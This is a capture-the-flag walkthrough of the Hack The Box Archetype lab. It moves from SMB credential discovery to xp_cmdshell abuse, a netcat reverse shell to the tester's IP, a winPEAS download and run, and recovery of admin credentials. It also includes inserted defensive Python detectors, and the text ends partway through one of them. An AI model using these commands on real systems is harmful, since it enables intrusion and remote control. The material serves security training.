The aim of this walkthrough is to provide help with the Archetype machine on the Hack The Box website. Please note that no flags are directly provided here. Moreover, be aware that this is only one of the many ways to solve the challenges.
It belongs to a series of tutorials that aim to help out complete beginners with finishing the Starting Point TIER 2 challenges.
SETUP
There are a couple of ways to connect to the target machine. The one we will be using throughout this walkthrough is via the provided pwnbox.
Once our connection is taken care of, we spawn the target machine.
Additionally - even though not required - it is possible to set a local variable (only available in the current shell) containing our target host’s IP address. Once set, we can easily access it by prepending a $ to our variable name.
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $rhost=<target-hosts-ip>
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $ echo $rhost
<target-hosts-ip>
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $
We can use the unset command to remove it once we no longer need it.
┌─[✗]─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $unset rhost
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $
TASK 1
Question: Which TCP port is hosting a database server?
We start our recon with a quick connection check.
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$ ping $rhost -c 4
PING 10.129.63.163 (10.129.63.163) 56(84) bytes of data.
64 bytes from 10.129.63.163: icmp_seq=1 ttl=127 time=12.0 ms
64 bytes from 10.129.63.163: icmp_seq=2 ttl=127 time=11.4 ms
64 bytes from 10.129.63.163: icmp_seq=3 ttl=127 time=11.7 ms
64 bytes from 10.129.63.163: icmp_seq=4 ttl=127 time=11.4 ms
--- 10.129.63.163 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3005ms
rtt min/avg/max/mdev = 11.352/11.636/12.018/0.265 ms
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$
Then we follow up with a scan of the top 1000 TCP ports (version and script scan).
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$ nmap -sC -sV $rhost
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-11 14:33 BST
Nmap scan report for 10.129.63.163
Host is up (0.057s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
|_ssl-date: 2023-05-11T13:33:22+00:00; +1s from scanner time.
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-05-11T13:25:34
|_Not valid after: 2053-05-11T13:25:34
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h45m01s, deviation: 3h30m00s, median: 0s
| smb-os-discovery:
| OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
| Computer name: Archetype
| NetBIOS computer name: ARCHETYPE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2023-05-11T06:33:14-07:00
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-05-11T13:33:16
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.32 seconds
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$
Four ports are reported to be open on our target. Additionally, there are some other interesting pieces of information to take note of:
- OS: Microsoft Windows
- SQL Server running on TCP port 1433
- guest login is enabled on port 445 (SMB)
Let us capitalize on this information.
1433
TASK 2
Question: What is the name of the non-Administrative share available over SMB?
Listing the shares available over SMB with the guest username (guest access) directs us toward the backups share.
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$ smbclient -U guest -L $rhost
Password for [WORKGROUP\guest]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
SMB1 disabled -- no workgroup available
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$
backups
TASK 3
Question: What is the password identified in the file on the SMB share?
Accessing the share and listing its contents brings us to the - prod.dtsConfig - file.
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$ smbclient -U guest \\\\$rhost\\backups
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Jan 20 12:20:57 2020
.. D 0 Mon Jan 20 12:20:57 2020
prod.dtsConfig AR 609 Mon Jan 20 12:23:02 2020
5056511 blocks of size 4096. 2531250 blocks available
smb: \> get prod.dtsConfig
getting file \prod.dtsConfig of size 609 as prod.dtsConfig (12.1 KiloBytes/sec) (average 12.1 KiloBytes/sec)
smb: \> exit
After the download is finished, opening it on our local machine will bring us a nice surprise.
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$ cat prod.dtsConfig
<DTSConfiguration>
<DTSConfigurationHeading>
<DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
</DTSConfigurationHeading>
<Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
<ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
</Configuration>
</DTSConfiguration>
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$
Even though it looks like an ordinary configuration file, there are potential credentials sitting in its connection string.
| potential credentials | |
|---|---|
| host | ARCHETYPE |
| username | sql_svc |
| password | M3g4c0rp123 |
But since proper recon is always key, we make sure to check out the other shares too, even if they do not look that interesting at first sight.
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$ smbclient -U guest \\\\$rhost\\ADMIN$
Password for [WORKGROUP\guest]:
tree connect failed: NT_STATUS_ACCESS_DENIED
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$ smbclient -U guest \\\\$rhost\\IPC$
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_NO_SUCH_FILE listing \*
smb: \> exit
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$
We were right, nothing interesting there. But still, it never hurts to check.
M3g4c0rp123
TASK 4
Question: What script from Impacket collection can be used in order to establish an authenticated connection to a Microsoft SQL Server?
Once we have Impacket installed, using the tab-autocomplete feature can help us out.
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$ impacket-
impacket-addcomputer impacket-lookupsid impacket-rpcmap
impacket-atexec impacket-mimikatz impacket-sambaPipe
impacket-dcomexec impacket-mqtt_check impacket-samrdump
impacket-dpapi impacket-mssqlclient impacket-secretsdump
impacket-esentutl impacket-mssqlinstance impacket-services
impacket-exchanger impacket-netview impacket-smbclient
impacket-findDelegation impacket-nmapAnswerMachine impacket-smbexec
impacket-GetADUsers impacket-ntfs-read impacket-smbrelayx
impacket-getArch impacket-ntlmrelayx impacket-smbserver
impacket-GetNPUsers impacket-ping impacket-sniff
impacket-getPac impacket-ping6 impacket-sniffer
impacket-getST impacket-psexec impacket-split
impacket-getTGT impacket-raiseChild impacket-ticketConverter
impacket-GetUserSPNs impacket-rdp_check impacket-ticketer
impacket-goldenPac impacket-reg impacket-wmiexec
impacket-karmaSMB impacket-registry-read impacket-wmipersist
impacket-kintercept impacket-rpcdump impacket-wmiquery
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$ impacket-
Therefore, it will come down to these noteworthy fellows:
- impacket-mssqlclient
- impacket-mssqlinstance
Checking them both out should make our choice quite easy.
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$ impacket-mssqlclient --help
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra
usage: mssqlclient.py [-h] [-port PORT] [-db DB] [-windows-auth] [-debug] [-file FILE]
[-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key]
[-dc-ip ip address]
target
TDS client implementation (SSL supported).
positional arguments:
target [[domain/]username[:password]@]<targetName or address>
optional arguments:
-h, --help show this help message and exit
-port PORT target MSSQL port (default 1433)
-db DB MSSQL database instance (default None)
-windows-auth whether or not to use Windows Authentication (default False)
-debug Turn DEBUG output ON
-file FILE input file with commands to execute in the SQL shell
authentication:
-hashes LMHASH:NTHASH
NTLM hashes, format is LMHASH:NTHASH
-no-pass don't ask for password (useful for -k)
-k Use Kerberos authentication. Grabs credentials from ccache file
(KRB5CCNAME) based on target parameters. If valid credentials cannot
be found, it will use the ones specified in the command line
-aesKey hex key AES key to use for Kerberos Authentication (128 or 256 bits)
-dc-ip ip address IP Address of the domain controller. If ommited it use the domain
part (FQDN) specified in the target parameter
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$impacket-mssqlinstance --help
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra
usage: mssqlinstance.py [-h] [-timeout TIMEOUT] host
Asks the remote host for its running MSSQL Instances.
positional arguments:
host target host
optional arguments:
-h, --help show this help message and exit
-timeout TIMEOUT timeout to wait for an answer
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$
Since we already have the credentials, let’s try to connect. It is important to note that without the -windows-auth optional argument our connection will not work, because ARCHETYPE\sql_svc is a Windows account rather than a SQL Server login, so the client has to use Windows authentication.
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$ impacket-mssqlclient ARCHETYPE/sql_svc:M3g4c0rp123@$rhost -windows-auth
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'.
[*] INFO(ARCHETYPE): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL>
mssqlclient.py
TASK 5
Question: What extended stored procedure of Microsoft SQL Server can be used in order to spawn a Windows command shell?
Using the built-in help command in our authenticated sql session should shine a light on our answer.
SQL> help
lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
sp_start_job {cmd} - executes cmd using the sql server agent (blind)
! {cmd} - executes a local shell cmd
SQL>
Trying to get some more information about what the xp_cmdshell command exactly does is a bust, but it does provide us with some further hints.
SQL> xp_cmdshell help
[-] ERROR(ARCHETYPE): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
SQL>
Breaking it down, it looks like the shell tried to run help directly as a command, but it was stopped because the feature is not turned on yet. Enabling it sounds like a good idea, so let’s try it.
SQL> enable_xp_cmdshell
[*] INFO(ARCHETYPE): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(ARCHETYPE): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL>
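From the defender's side, the two configuration messages above are also what SQL Server writes to its ERRORLOG. The following Python is an added example, not part of this walkthrough, that flags that enable sequence in constructed ERRORLOG-style lines (the timestamp/spid line layout is assumed):

```python
"""Detect xp_cmdshell being switched on, from SQL Server ERRORLOG-style lines (added
example, not part of the walkthrough). The 'Configuration option ... changed from
0 to 1' messages enable_xp_cmdshell printed above are the same text SQL Server
writes to its ERRORLOG, so a defender can alert on them. The log excerpt below is
constructed and assumes the '<timestamp> <spid> <message>' ERRORLOG layout."""
import re
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2})\s+(?P<src>\S+)\s+(?P<msg>.*)$")
CONFIG_RE = re.compile(
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)")
WINDOW = timedelta(minutes=5)   # both flips by one spid inside this window = one enable sequence


def parse_line(line):
    """Return (timestamp, source, message), or None for lines that do not fit the layout."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f"), m["src"], m["msg"]


def find_xp_cmdshell_enablement(lines):
    """Return one finding per 0 -> 1 flip of xp_cmdshell.

    Rated 'high' when the same spid flipped 'show advanced options' shortly before:
    that is the sp_configure sequence the SQL shell's enable_xp_cmdshell runs.
    """
    findings = []
    advanced_on = {}   # spid -> time it set 'show advanced options' to 1
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, spid, msg = parsed
        m = CONFIG_RE.search(msg)
        if not m or (m["old"], m["new"]) != ("0", "1"):
            continue                    # only options being turned on matter here
        if m["option"] == "show advanced options":
            advanced_on[spid] = ts
        elif m["option"] == "xp_cmdshell":
            earlier = advanced_on.get(spid)
            if earlier is not None and ts - earlier <= WINDOW:
                severity = "high"
                reason = "xp_cmdshell enabled right after 'show advanced options' by the same spid"
            else:
                severity = "medium"
                reason = "xp_cmdshell enabled"
            findings.append({"spid": spid, "time": ts, "severity": severity, "reason": reason})
    return findings


# Constructed ERRORLOG excerpt: spid56 runs the full enable sequence, spid61 only
# flips xp_cmdshell and later turns it back off (which is not reported).
SAMPLE_ERRORLOG = """\
2023-05-11 13:39:58.11 Logon       Login succeeded for user 'ARCHETYPE\\sql_svc'. [CLIENT: 10.10.14.46]
2023-05-11 13:40:12.34 spid56      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2023-05-11 13:40:12.35 spid56      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2023-05-11 14:02:40.90 spid61      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2023-05-11 14:10:01.02 spid61      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
"""

if __name__ == "__main__":
    for f in find_xp_cmdshell_enablement(SAMPLE_ERRORLOG.splitlines()):
        print(f"[{f['severity']}] {f['time']} {f['spid']}: {f['reason']}")
```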
Great, it worked and the feature is now turned on. Let’s run whoami to see whether commands actually execute.
SQL> xp_cmdshell whoami
output
-----------------
archetype\sql_svc
NULL
SQL>
Wow, it worked. But where are we exactly?
SQL> xp_cmdshell echo %cd%
output
-------------------
C:\Windows\system32
NULL
SQL>
What else can we run? Can we just grab the user flag from here directly?
SQL> xp_cmdshell "powershell cat C:\Users\sql_svc\Desktop\user.txt"
output
--------------------------------
<flag>
NULL
SQL>
Actually, we can and we just did. But communicating with our target this way (via the interactive sql shell) is quite cumbersome. So our next course of action should be to get a reverse shell on the target.
In a nutshell, it could look something like this:
- making the netcat binary available on lhost (local machine)
- using the interactive sql terminal to download this binary to the target machine
- creating a netcat listener on lhost
- running the netcat binary on the target via the interactive sql shell to connect back to lhost
So let’s start with #1: Our first action is to download the Windows netcat binary (nc64.exe) and store it on our local machine.
Running Python's http.server module in the same directory starts a local web server that makes all the files in that directory accessible over HTTP.
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$ ll
total 48K
-rw-r--r-- 1 htb-bluewalle htb-bluewalle 45K May 11 16:20 nc64.exe
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$ python -m http.server 4444
Serving HTTP on 0.0.0.0 port 4444 (http://0.0.0.0:4444/) ...
Continuing with #2: We go back to our interactive sql shell and try downloading the binary using powershell and wget (an alias for Invoke-WebRequest in Windows PowerShell).
Our first attempt is to download the file (from our current directory) and save it to - C:\Users\sql_svc\Downloads - (where we have write access), but we get an error, because -outfile has been pointed at the directory itself instead of a file name inside it…
SQL> xp_cmdshell "powershell -c wget http://10.10.14.46:4444/nc64.exe -outfile C:\Users\sql_svc\Downloads"
output
--------------------------------------------------------------------------------
wget : Access to the path 'C:\Users\sql_svc\Downloads' is denied.
At line:1 char:1
+ wget http://10.10.14.46:4444/nc64.exe -outfile C:\Users\sql_svc\Downl ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Invoke-WebRequest], UnauthorizedAccessException
+ FullyQualifiedErrorId : System.UnauthorizedAccessException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand
NULL
SQL>
In our second attempt, we first head to - C:\Users\sql_svc\Downloads - and only after changing directory do we download the binary, this time giving -outfile a file name.
SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.14.46:4444/nc64.exe -outfile nc64.exe"
output
------
NULL
SQL>
This time we are successful and our binary is located at - C:\Users\sql_svc\Downloads\nc64.exe -.
SQL> xp_cmdshell "powershell -c ls C:\Users\sql_svc\Downloads"
output
--------------------------------------------------------------------------------
NULL
NULL
Directory: C:\Users\sql_svc\Downloads
NULL
NULL
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/11/2023 8:57 AM 45272 nc64.exe
NULL
NULL
NULL
SQL>
We shut down the http server right after the download has finished.
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$ python -m http.server 4444
Serving HTTP on 0.0.0.0 port 4444 (http://0.0.0.0:4444/) ...
10.129.63.163 - - [11/May/2023 16:56:39] "GET /nc64.exe HTTP/1.1" 200 -
10.129.63.163 - - [11/May/2023 16:57:33] "GET /nc64.exe HTTP/1.1" 200 -
^C
Keyboard interrupt received, exiting.
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$
Now for #3: It’s time to start our listener.
# on lhost
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$ nc -lvnp 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Finally (#4): We try to run the netcat binary on the target and instruct it to connect back to our local machine.
SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe 10.10.14.46 4444"
No output here. Did it work? Once we head over to the listener from #3, we see that we got a reverse shell back, so it did.
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$ nc -lvnp 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.129.63.163.
Ncat: Connection from 10.129.63.163:49680.
Microsoft Windows [Version 10.0.17763.2061]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Users\sql_svc\Downloads>
Let’s use our new (and much better) connection to grab the user flag (again).
C:\Users\sql_svc\Downloads>whoami
whoami
archetype\sql_svc
C:\Users\sql_svc\Downloads>cd ..\Desktop\
cd ..\Desktop\
C:\Users\sql_svc\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 9565-0B4F
Directory of C:\Users\sql_svc\Desktop
01/20/2020 06:42 AM <DIR> .
01/20/2020 06:42 AM <DIR> ..
02/25/2020 07:37 AM 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 10,711,236,608 bytes free
C:\Users\sql_svc\Desktop>type user.txt
type user.txt
<flag>
C:\Users\sql_svc\Desktop>
xp_cmdshell
TASK 6
Question: What script can be used in order to search possible paths to escalate privileges on Windows hosts?
One of the most commonly used scripts for privilege escalation on Windows is winPEAS.
Let’s bring it over to our target. We go through the same motions as before:
- Python http server in the directory where the file is located - lhost
- use powershell and wget to copy it over - rhost
Since winpeas is already downloaded to pwnbox, locating it seems like the only thing still left for us to do. It might take some time, but it can be found at
/opt/useful/privilege-escalation-awesome-scripts-suite/winPEAS/winPEASexe/binaries/x64/Release/winPEASx64.exe
Then, we copy it over to our working directory.
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[/opt/useful/privilege-escalation-awesome-scripts-suite/winPEAS/winPEASexe/binaries/x64/Release]
└──╼ [★]$ cp winPEASx64.exe ~/archetype/
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[/opt/useful/privilege-escalation-awesome-scripts-suite/winPEAS/winPEASexe/binaries/x64/Release]
└──╼ [★]$
Then we change back to our working directory and start our http server.
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[/opt/useful/privilege-escalation-awesome-scripts-suite/winPEAS/winPEASexe/binaries/x64/Release]
└──╼ [★]$ cd ~/archetype/
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$ python -m http.server 4444
Serving HTTP on 0.0.0.0 port 4444 (http://0.0.0.0:4444/) ...
Then we use our reverse shell to download it to rhost.
C:\Users\sql_svc\Downloads>powershell -c wget http://10.10.14.46:4444/winPEASx64.exe -outfile winPEASx64.exe
powershell -c wget http://10.10.14.46:4444/winPEASx64.exe -outfile winPEASx64.exe
C:\Users\sql_svc\Downloads>
Once downloaded, we close up the http server.
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$ python -m http.server 4444
Serving HTTP on 0.0.0.0 port 4444 (http://0.0.0.0:4444/) ...
10.129.63.163 - - [11/May/2023 18:06:33] "GET /winPEASx64.exe HTTP/1.1" 200 -
^C
Keyboard interrupt received, exiting.
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$
All that’s left for us is to run it.
C:\Users\sql_svc\Downloads>powershell -c .\winPEASx64.exe
powershell -c .\winPEASx64.exe
ANSI color bit for Windows is not set. If you are execcuting this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
ADVISORY: winpeas should be used for authorized penetration testing and/or educational purposes only.Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
WinPEASng by @carlospolopm, makikvues(makikvues2[at]gmail[dot]com)
[+] Legend:
Red Indicates a special privilege over an object or something is misconfigured
Green Indicates that some protection is enabled or something is well configured
Cyan Indicates active users
Blue Indicates disabled users
LightYellow Indicates links
You can find a Windows local PE Checklist here: https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation
Creating Dynamic lists, this could take a while, please wait...
- Loading YAML definitions file...
- Checking if domain...
- Getting Win32_UserAccount info...
- Creating current user groups list...
- Creating active users list (local only)...
- Creating disabled users list...
- Admin users list...
- Creating AppLocker bypass list...
- Creating files/directories list for search...
[+] System Information
[+] Basic System Information
Check if the Windows versions is vulnerable to some known exploit https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#kernel-exploits
Hostname: Archetype
ProductName: Windows Server 2019 Standard
EditionID: ServerStandard
ReleaseId: 1809
BuildBranch: rs5_release
CurrentMajorVersionNumber: 10
CurrentVersion: 6.3
Architecture: AMD64
ProcessorCount: 2
SystemLang: en-US
KeyboardLang: English (United States)
TimeZone: (UTC-08:00) Pacific Time (US & Canada)
IsVirtualMachine: True
Current Time: 5/11/2023 10:08:59 AM
HighIntegrity: False
PartOfDomain: False
Hotfixes: KB5004335, KB5003711, KB5004244,
[?] Windows vulns search powered by Watson(https://github.com/rasta-mouse/Watson)
[*] OS Version: 1809 (17763)
[*] Enumerating installed KBs...
[!] CVE-2019-0836 : VULNERABLE
[>] https://exploit-db.com/exploits/46718
[>] https://decoder.cloud/2019/04/29/combinig-luafv-postluafvpostreadwrite-race-condition-pe-with-diaghub-collector-exploit-from-standard-user-to-system/
[!] CVE-2019-0841 : VULNERABLE
[>] https://github.com/rogue-kdc/CVE-2019-0841
[>] https://rastamouse.me/tags/cve-2019-0841/
[!] CVE-2019-1064 : VULNERABLE
[>] https://www.rythmstick.net/posts/cve-2019-1064/
[!] CVE-2019-1130 : VULNERABLE
[>] https://github.com/S3cur3Th1sSh1t/SharpByeBear
[!] CVE-2019-1253 : VULNERABLE
[>] https://github.com/padovah4ck/CVE-2019-1253
[>] https://github.com/sgabe/CVE-2019-1253
[!] CVE-2019-1315 : VULNERABLE
[>] https://offsec.almond.consulting/windows-error-reporting-arbitrary-file-move-eop.html
[!] CVE-2019-1385 : VULNERABLE
[>] https://www.youtube.com/watch?v=K6gHnr-VkAg
[!] CVE-2019-1388 : VULNERABLE
[>] https://github.com/jas502n/CVE-2019-1388
[!] CVE-2019-1405 : VULNERABLE
[>] https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/
[>] https://github.com/apt69/COMahawk
[!] CVE-2020-0668 : VULNERABLE
[>] https://github.com/itm4n/SysTracingPoc
[!] CVE-2020-0683 : VULNERABLE
[>] https://github.com/padovah4ck/CVE-2020-0683
[>] https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/PowershellScripts/cve-2020-0683.ps1
[!] CVE-2020-1013 : VULNERABLE
[>] https://www.gosecure.net/blog/2020/09/08/wsus-attacks-part-2-cve-2020-1013-a-windows-10-local-privilege-escalation-1-day/
[*] Finished. Found 12 potential vulnerabilities.
...
...
...
[+] Analyzing Windows Files Files (limit 70)
C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
C:\Users\Default\NTUSER.DAT
C:\Users\sql_svc\NTUSER.DAT
[+] Analyzing Other Windows Files Files (limit 70)
C:\Users\sql_svc\Downloads>
winpeas
TASK 7
Question: What file contains the administrator’s password?
The output from winPEAS is quite lengthy (only a snippet is shown in TASK6), but one of its last lines mentioned the location of the PowerShell history file.
...
[+] Analyzing Windows Files Files (limit 70)
C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
...
Checking it will lead us to some administrator credentials.
C:\Users\sql_svc\Downloads>type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
exit
C:\Users\sql_svc\Downloads>
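Both files that gave up credentials on this box, the prod.dtsConfig connection string in TASK 3 and the PowerShell history shown here, are the kind of artefact an owner can scan for before anyone else does. The Python below is an added example, not part of this walkthrough, and runs over constructed copies of those two files; the finding format and the net use token rules are its own assumptions:

```python
"""Audit helper for the two plaintext-credential artefacts found on this box (added
example, not part of the walkthrough): flag passwords embedded in a .dtsConfig
ConnectionString (TASK 3) and in 'net use ... /user:' lines of a PSReadLine
ConsoleHost_history.txt (TASK 7). Both sample inputs are constructed copies."""
import re
import xml.etree.ElementTree as ET

SECRET_KEYS = {"password", "pwd"}   # connection-string keys that hold secrets
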